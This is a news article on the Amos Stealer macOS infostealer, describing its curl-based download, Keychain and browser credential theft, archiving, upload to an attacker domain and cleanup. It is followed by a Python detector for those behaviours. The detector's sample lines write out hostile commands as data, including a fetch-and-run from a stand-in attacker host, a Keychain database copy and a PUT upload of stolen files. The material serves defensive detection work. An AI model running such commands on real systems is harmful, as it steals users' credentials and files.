Amos Stealer Targets macOS Keychain Files and Browser Passwords
Amos Stealer malware targets macOS users via fake downloads, stealing passwords and sensitive files.
Summary
Amos Stealer, an information-stealing malware, is actively targeting macOS users through deceptive downloads and social engineering. The malware silently collects browser passwords, Keychain files, developer configurations, and session cookies. It utilizes built-in macOS utilities like curl and AppleScript to exfiltrate data, compressing it into an archive before sending it to attacker-controlled servers.
Full text
Amos Stealer targets macOS users through fake downloads, stealing Keychain files, browser passwords, cookies, and developer configs for data theft.
by Deeba Ahmed, June 16, 2026
Amos Stealer, an information-stealing malware, is targeting Apple Mac computers to steal private data, according to new details from cybersecurity research firm CyberProof. Threat actors are reportedly using this malware family to run financially motivated campaigns that compromise macOS environments.
Although Amos Stealer is not new, in the latest campaign the threat actors are distributing the infostealer through deceptive software downloads, fake websites, and social engineering lures. Once inside a Mac, it searches for valuable files across system directories. It then collects stored passwords, session cookies, and autofill form information from the Google Chrome and Microsoft Edge browsers.
Silent Download Methods
Researchers noted that the malware operators use curl, a utility built into macOS, to download the malicious files silently. During a recent incident investigation, a threat hunting query flagged an unusual curl command. The researchers also identified the specific server address that the cybercriminals were using to fetch the malicious script, as:
Further probing revealed that the hackers used the command flags -fsSL to make the download completely invisible to the user. These flags suppress error output and the download progress bar, so the download completes quietly with nothing shown to the user. Once the script is downloaded, it automatically launches an AppleScript command through the zsh shell to begin collecting data.
“Amos Stealer remains a prominent and highly active malware family specifically engineered to target macOS users and extract sensitive information from compromised systems,” researchers explained in the blog post shared with Hackread.com.
Data Stealing and Cleanup
The investigation also revealed that the infostealer copies the macOS Keychain database file, named login.keychain-db, to access saved corporate login details. It also searches the user’s home path for confidential developer configuration files and keys, including .kube, .ssh, .zshrc, and .gitconfig.
To prepare the data for the hackers, the malware uses ditto, a native macOS tool, to compress the stolen files into a single archive named osalogging.zip inside the /tmp folder. The script splits this file into 10 MB chunks and generates a unique session ID for the upload by combining the current timestamp with a random hexadecimal string from OpenSSL.
Figure: Amos Stealer exploiting macOS utilities to exfiltrate data (source: CyberProof)
Amos Stealer then sends the data to the attacker-controlled server (bestbuydomain.com) with an HTTP PUT request via curl. Notably, the script retries failed uploads up to eight times. After a successful upload, Amos Stealer runs cleanup commands (rm -f /tmp/osalogging.zip and rm -rf /tmp/sync) to erase its traces.
This silent type of attack lets threat actors easily steal saved credentials, which can leave compromised corporate networks exposed to data breaches and financial theft. CyberProof recommends that companies enforce strict Gatekeeper policies and monitor endpoints for unusual curl commands to block these threat actors.
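As an added example (not from the article or from CyberProof's report), the following Python check turns the behaviours described in the two sections above into a process command-line detector for endpoint telemetry: a quiet curl -fsSL download (and, an assumed pattern, one piped into zsh or another interpreter), ditto archiving into /tmp, a curl PUT upload of a /tmp file, access to login.keychain-db, the rm cleanup, and the reported domain. The sample command lines, and the exact shape of the cp and ditto invocations, are constructed for this example rather than captured telemetry.

```python
import re
import shlex

INTERPRETERS = {"zsh", "bash", "sh", "osascript"}
KNOWN_C2_DOMAIN = "bestbuydomain.com"  # domain reported in the article

def stages(cmdline):
    """Split a pipeline 'a | b' into argv lists, one per stage."""
    return [argv for argv in (shlex.split(p) for p in cmdline.split("|")) if argv]

def short_flags(argv):
    """Letters of single-dash options, so -fsSL and -f -s -S -L look alike."""
    return {ch for a in argv[1:] if re.fullmatch(r"-[A-Za-z]+", a) for ch in a[1:]}

def match_indicators(cmdline):
    """Return labels for every reported behaviour this command line shows."""
    hits = []
    st = stages(cmdline)
    names = [argv[0].rsplit("/", 1)[-1] for argv in st]  # basename of each stage
    for i, (name, argv) in enumerate(zip(names, st)):
        flags = short_flags(argv)
        if name == "curl" and {"f", "s", "S", "L"} <= flags:
            hits.append("quiet_curl_fsSL")  # no errors, no progress bar, follows redirects
            if INTERPRETERS & set(names[i + 1:]):
                hits.append("download_piped_to_interpreter")  # assumed pattern, not in article
        if name == "curl" and ("T" in flags or "PUT" in argv) and any(a.startswith("/tmp/") for a in argv):
            hits.append("curl_put_upload_from_tmp")
        if name == "ditto" and any(a.startswith("/tmp/") and a.endswith(".zip") for a in argv):
            hits.append("ditto_archive_in_tmp")
        if name == "rm" and any(a.startswith("/tmp/osalogging") or a == "/tmp/sync" for a in argv):
            hits.append("cleanup_of_staging_files")
        if any(a.endswith("login.keychain-db") for a in argv):
            hits.append("keychain_db_access")
    if KNOWN_C2_DOMAIN in cmdline:
        hits.append("known_c2_domain")
    return hits

def scan(cmdlines):
    """Keep only command lines that match at least one reported behaviour."""
    return [(c, h) for c in cmdlines for h in [match_indicators(c)] if h]

SAMPLE_CMDLINES = [  # constructed for this example, not captured telemetry
    "curl -fsSL http://attacker.example/install.sh | zsh",
    "cp /Users/alice/Library/Keychains/login.keychain-db /tmp/sync/",
    "ditto -c -k /tmp/sync /tmp/osalogging.zip",
    "curl -X PUT -T /tmp/osalogging.zip.part01 https://bestbuydomain.com/u/SESSION_ID",
    "rm -f /tmp/osalogging.zip",
    "curl -fsSL https://example.org/install.sh -o /tmp/install.sh",  # quiet, but not piped
]
```

A single quiet curl download is a weak signal on its own (the last sample line matches only that rule); the archive, upload and cleanup hits from one host within a short window are what should page an analyst.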
Indicators of Compromise
- domain — bestbuydomain.com
- malware — Amos Stealer